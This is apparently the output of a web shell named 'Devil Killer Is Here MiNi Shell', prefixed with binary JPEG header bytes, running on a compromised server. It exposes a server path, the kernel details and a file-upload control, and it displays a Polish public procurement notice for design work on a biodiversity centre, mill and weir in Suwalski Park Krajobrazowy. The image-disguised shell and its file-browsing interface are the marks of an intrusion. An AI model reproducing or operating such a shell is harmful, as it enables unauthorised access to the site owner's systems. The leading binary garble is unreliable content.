JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240425/0030251701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowej dla inwestycji polegającej na utworzeniu Centrum Bioróżnorodności Suwalskiego Parku Krajobrazowego w Turtulu, w tym odbudowy młyna i jazu na rzece Czarna Hańcza. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SUWALSKI PARK KRAJOBRAZOWY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 790123179</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Malesowizna 24</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Malesowizna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">16-404</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL843 - Suwalski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@spk.wrotapodlasia.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://spk.org.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowej dla inwestycji polegającej na utworzeniu Centrum Bioróżnorodności Suwalskiego Parku Krajobrazowego w Turtulu, w tym odbudowy młyna i jazu na rzece Czarna Hańcza. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2c6bc391-024a-11ef-b81b-aebd110f5279</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00302517</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-04-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00573196/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Aktualizacja projektu Centrum Bioróżnorodności Suwalskiego Parku Krajobrazowego w tym rozbiórka ruin i budowa młyna wodnego oraz rozbiórka i budowa jazu na rzece Cz. Hańcza w Malesowiźnie - cz. I i II</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Inwestycja planowana jest do realizacji w ramach projektu strategicznego Województwa Podlaskiego pn. „Ochrona i przywracanie różnorodności biologicznej i krajobrazowej oraz funkcji ekosystemów na terenie województwa podlaskiego” z wykorzystaniem dofinansowania ze środków z Europejskiego Funduszu Rozwoju Regionalnego (EFRR) w ramach Programu „Fundusze Europejskie dla Podlaskiego 2021-2027”. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-2c6bc391-024a-11ef-b81b-aebd110f5279 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Zamawiający do kontaktu z Wykonawcami wyznacza następujące osoby: <br/>a. w sprawach związanych z opisem przedmiotu zamówienia: Pani Teresa Świerubska, e-mail: dyrektor@spk.wrotapodlasia.pl, <br/>b. w sprawach związanych z procedurą udzielenia zamówienia publicznego: Pan Marek Wrona, e-mail: marek.wrona@wigry.org.pl. <br/>Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem:<br/>a. Platformy e-Zamówienia – poprzez stronę internetową postępowania https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-2c6bc391-024a-11ef-b81b-aebd110f5279 zakładka „Formularze” lub<br/>b. poczty elektronicznej z osobami wymienionymi wyżej w ust. 1<br/>Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>Postępowanie można wyszukać również ze strony głównej Platformy e-Zamówienia używając przycisku „Przeglądaj postępowania / konkursy” – identyfikator (ID) postępowania na Platformie eZamówienia: ocds-148610-2c6bc391-024a-11ef-b81b-aebd110f5279</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udziałw postępowaniu o udzielenie zamówienia publicznego powinien posiadać konto podmiotu „Wykonawca&#34; na Platformie e-Zamówienia. <br/>Dokumenty elektroniczne, o których mowa w § 2 ust. 1 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawiesposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie, sporządza się w postacielektronicznej, w formatach danych określonych w Rozporządzeniu Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych<br/>Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej orazminimalnych wymagań dla systemów teleinformatycznych z uwzględnieniem rodzaju przekazywanych danych, i przekazuje się jakozałączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy p.z.p., ww. regulacje nie będą miały bezpośredniegozastosowania.<br/>Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 Rozporządzenia Prezesa Rady Ministrów w sprawie<br/>sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środkówkomunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie, sporządza się w postacielektronicznej:<br/>a) w formatach danych określonych w Rozporządzeniu Prezesa Rady Ministrów w sprawie Krajowych Ram Interoperacyjności,minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dlasystemów teleinformatycznych i przekazuje jako załącznik lub<br/>b) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treściwiadomości e-mail lub poprzez platformę eZamówienia zakładka „Formularze” na stronie internetowej postępowania.<br/>Załączniki, które są zgodnie z ustawą p.z.p. lub rozporządzeniem Prezesa Rady Ministrów w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej wvvpostępowaniu o udzielenie zamówienia publicznego lub konkursie, opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone podpisem typu zewnętrznego lub wewnętrznego. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się uprzednio podpisane dokumenty wraz zvwygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>Możliwość korzystania w postępowaniu z zakładki „Formularze” w pełnym zakresie wymaga posiadania konta „Wykonawcy” naPlatformie e- Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z zakładki „Formularze&#34; służących do<br/>zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego naPlatformie e- Zamówienia.<br/>Wszystkie wysłane i odebrane w postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu w podglądzievpostępowania w zakładce „Komunikacja”.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem zakładki „Formularze&#34; wynosi 150 MB (wielkość ta dotyczy plikówvprzesyłanych jako załączniki do jednego formularza).<br/>9) W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”. Właścicielem i administratorem platformy eZamówienia jest Urząd Zamówień Publicznych. Zamawiający nie ma wpływu i nie ponosi odpowiedzialności zafunkcjonowanie platformy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Opisano w dokumentacji zamówienia Rozdział II SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Opisano w dokumentacji zamówienia Rozdział II SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Aktualizacja istniejącej dokumentacji projektowej i kosztorysowej dla zadania inwestycyjnego pn. „Opracowanie projektów<br/>rozbiórki i budowy młyna w miejscowości Malesowizna w celu utworzenia ośrodka ochrony i edukacji o bioróżnorodności, w<br/>tym aranżacja wystaw na temat bioróżnorodności SPK i jej ochrony”.<br/>Analiza istniejącego projektu budowlanego i wykonawczego, ujętych w Załączniku nr 8 do SWZ, i projektu wystaw, ujętego w<br/>Załączniku nr 9 do SWZ, celem określenia zakresu niezbędnych zmian mających na celu dostosowanie go do<br/>obowiązujących obecnie norm i przepisów prawa oraz aktualnych potrzeb Zamawiającego. Zamawiający oświadcza, że<br/>posiada pełne autorskie prawa majątkowe do dokumentacji projektowej mającej być przedmiotem aktualizacji i przejmuje na<br/>siebie ewentualne roszczenia jej autorów. <br/>Aktualizacja istniejącej dokumentacji, o której mowa w pkt 1), w zakresie niezbędnym do jej dostosowania do<br/>obowiązujących obecnie norm i przepisów prawa oraz adaptację wnętrz do obecnych potrzeb Zamawiającego.<br/>Wprowadzone w trakcie aktualizacji zmiany nie mogą prowadzić do powstania zmian istotnych, o których mowa w art. 36a<br/>ust. 5 ustawy Prawo budowlane powodujących powstanie konieczności zmiany posiadanego przez Zamawiającego<br/>pozwolenia na budowę. <br/>Uzupełnienie dokumentacji projektowej budynku młyna o projekt instalacji SSP – System sygnalizacji pożarowej oraz jego<br/>uzgodnienie z rzeczoznawcą ds. p.poż.<br/>Opracowanie wizualizacji budynku Centrum Bioróżnorodności SPK z poziomu człowieka i z lotu ptaka<br/>Opracowanie wizualizacji 3D wnętrz budynku Centrum Bioróżnorodności SPK.<br/>Opracowanie kosztorysów inwestorskich <br/>Opracowanie przedmiarów i specyfikacji technicznej wykonania i odbioru robót budowlanych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</p> <p class="mb-0">79932000-6 - Usługi projektowania wnętrz</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">„Doświadczenie zawodowe koordynatora zespołu projektowego”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opracowanie dokumentacji projektowej i kosztorysowej dla zadania inwestycyjnego pn. „Rozbiórka i budowa jazu<br/>piętrzącego wodę rzeki Czarna Hańcza, budowa przepławki dla ryb, rozbiórka i budowa mostu nad jazem, odbudowa<br/>dawnego koła młyńskiego oraz wykonanie instalacji fotowoltaicznej”. w szczególności wykonanie: Pełno branżowego<br/>projektu budowlanego zawierającego projekt zagospodarowania terenu, projekt architektoniczno-budowlany i projekt<br/>techniczny, w zakresie niezbędnym do uzyskania pozwolenia na budowę, wykonania robót budowlano montażowych i<br/>przeprowadzenia procedury wyboru Wykonawcy tych robót, zgodnie z wymogami ustawy p.z.p. (w szczególności ujętymi w<br/>Dziale II, Rozdziale 1, Oddziale 4 Opis przedmiotu zamówienia).<br/>Dwuprzęsłowego jazu w konstrukcji żelbetowej z szandorami wykonanymi z drewna dębowego<br/>Przepławki dla ryb i innych organizmów wodnych na szerokości koryta rzeki Czarna Hańcza, poniżej jazu piętrzącego wodę<br/>Mostu nad jazem o szerokości do 4 m w konstrukcji stalowej lub tworzywa sztucznego wytworzonego w wyniku recyklingu<br/>odpadów z tworzyw sztucznych<br/>Pionowego koła młyńskiego z poziomą osią. Typ koła nadsiębierne – zasilane wodą od góry. Materiał konstrukcyjny –<br/>drewno<br/>Budowy instalacji fotowoltaicznej o powierzchni paneli około 100 m2 wraz z magazynem energii.<br/>Badań geotechnicznych podłoża na terenie objętym projektem rozbiórki i budowy jazu i elementów towarzyszących,<br/>Opracowanie dokumentów niezbędnych do uzyskania:<br/>a) decyzji o warunkach zabudowy,<br/>b) decyzji o środowiskowych uwarunkowaniach,<br/>c) pozwolenia wodnoprawnego.<br/>Opracowanie wizualizacji jazu z poziomu człowieka i z lotu ptaka<br/>Opracowanie kosztorysów inwestorskich <br/>Opracowanie przedmiarów i specyfikacji technicznej wykonania i odbioru robót budowlanych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</p> <p class="mb-0">79932000-6 - Usługi projektowania wnętrz</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">280 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">„Doświadczenie zawodowe koordynatora zespołu projektowego”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W oparciu o art. 112 i 116 ust. 1 ustawy p.z.p. Zamawiający wymaga, aby Wykonawcy ubiegający się o zamówienie<br/>wykazali posiadanie zdolności technicznej lub zawodowej, tj. dysponowali lub na czas realizacji zamówienia będą<br/>dysponować co najmniej po jednej osobie w każdej z niżej wymienionych specjalności, która będzie uczestniczyć w<br/>wykonywaniu zamówienia:<br/>1) W zakresie Części 1 zamówienia:<br/>a. Projektant – koordynator zespołu, posiadający uprawnienia budowlane do projektowania w specjalności architektonicznej<br/>bez ograniczeń i dysponujący doświadczeniem polegającym na pełnieniu przez tą osobę w ciągu ostatnich pięciu lat przed<br/>terminem składania ofert funkcji koordynatora zespołu projektowego, który wykonał co najmniej jedną dokumentację<br/>projektową obiektu zawierającego elementy wystaw i multimediów o wartości kosztorysowej nie niższej niż 3 milionów zł<br/>(wartość dotyczy zaprojektowanego obiektu) Osoba ta będzie pełniła rolę koordynatora wszystkich zespołów projektowych<br/>zaangażowanych w realizację Części 1 przedmiotu niniejszego zamówienia, <br/>b. Projektant posiadający uprawnienia budowlane bez ograniczeń do projektowania w specjalności konstrukcyjno-<br/>budowlanej <br/>c. Projektant posiadający uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i<br/>urządzeń wodociągowych kanalizacyjnych, cieplnych, wentylacyjnych bez ograniczeń, <br/>d. Projektant posiadający uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i<br/>urządzeń elektrycznych i elektroenergetycznych, bez ograniczeń,<br/>e. osoba odpowiedzialna za adaptację projektu aranżacji i scenografii wystaw legitymująca się dyplomem ukończenia<br/>studiów wyższych II stopnia z dziedziny sztuki o kierunku/specjalności mające związek z architekturą wnętrz,<br/>projektowaniem produktu, przestrzeni i przekazu; scenografią, grafiką, rzeźbą, malarstwem, sztuką i wzornictwem, sztuką<br/>mediów, posiadająca odpowiednie doświadczenie, tj. w okresie ostatnich pięciu lat przed upływem terminu składania ofert<br/>opracowała lub brała udział jako współautor, w opracowaniu, co najmniej jednego projektu aranżacji i scenografii wystawy<br/>stałej o powierzchni nie mniejszej niż 200 m2 lub instalacji edukacyjnej. Jako wystawę stałą rozumieć należy wystawę o<br/>założonym okresie eksploatacji nie krótszym niż 1 rok. Jako instalację edukacyjną należy rozumieć, np. interaktywną<br/>ścieżkę edukacyjną, interaktywny plac zabaw, wioskę tematyczną. Osoba ta będzie jednocześnie koordynowała współpracę<br/>zespołu opracowującego projekt wystaw i wyposażenia wnętrz z zespołem opracowującym dokumentację budowlaną.<br/>f. Osoba odpowiedzialna za projekt aktualizacji treści multimedialnych posiadająca odpowiednie doświadczenie, tj. W<br/>okresie ostatnich trzech lat przed upływem składania ofert wykonała nie mniej niż 3 animacje dla potrzeb ekspozycji,<br/>g. Osoba odpowiedzialna za wykonanie projektu grafiki 2d i 3d posiadająca co najmniej 3-letnie doświadczenie w zakresie<br/>przygotowywania, opracowywania i wykonywania projektów grafik i rekonstrukcji w technologii 3d oraz w okresie ostatnich<br/>trzech lat przed upływem składania ofert wykonała nie mniej niż 3 opracowywania zrealizowanych projektów grafik i<br/>rekonstrukcji w technologii 3d.<br/>W zakresie Części 2 zamówienia:<br/>a. jedna osoba posiadająca uprawnienia budowlane do projektowania w specjalności:<br/>a) inżynieryjnej hydrotechnicznej lub melioracyjnej o ograniczonym zakresie lub<br/>b) konstrukcyjno-budowlanej bez ograniczeń<br/>posiadająca doświadczenie zawodowe polegające 